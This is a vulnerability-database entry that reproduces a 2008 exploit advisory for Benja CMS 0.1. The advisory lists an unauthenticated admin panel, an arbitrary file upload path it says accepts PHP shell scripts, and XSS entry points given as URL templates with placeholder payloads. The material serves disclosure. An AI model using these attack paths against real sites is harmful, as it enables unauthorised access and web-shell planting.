Benja CMS 0.1 (Upload/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052672 漏洞类型
发布时间 2008-06-23 更新时间 2008-06-23
CVE编号 CVE-2008-2879
CVE-2008-2987
CVE-2008-2988
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008060064
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 ==============================================================
  Benja CMS 0.1 (Upload/XSS) Multiple Remote Vulnerabilities
==============================================================

AUTHOR : CWH Underground
DATE   : 22 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Benja CMS
 VERSION     : 0.1
 VENDOR	     : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/benjacms
#####################################################

--- Broken Authentication ---

Anonymous can access to administrative control that can add/delete menu
[+] http://[Target]/[benjacms_path]/admin/


--- Arbitrary File upload ---

Upload Path:
[+] http://[Target]/[benjacms_path]/admin/upload.php

File Location:
[+] http://[Target]/[benjacms_path]/billeder/[Evil File]

***Can upload malicious files such as php shell script***


--- Remote XSS Exploit ---

---------
 Exploit
---------

[+] http://[Target]/[benjacms_path]/admin/admin_edit_submenu.php/<XSS>
[+] http://[Target]/[benjacms_path]/admin/admin_new_submenu.php/<XSS>
[+] http://[Target]/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS>

##################################################################
  Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
##################################################################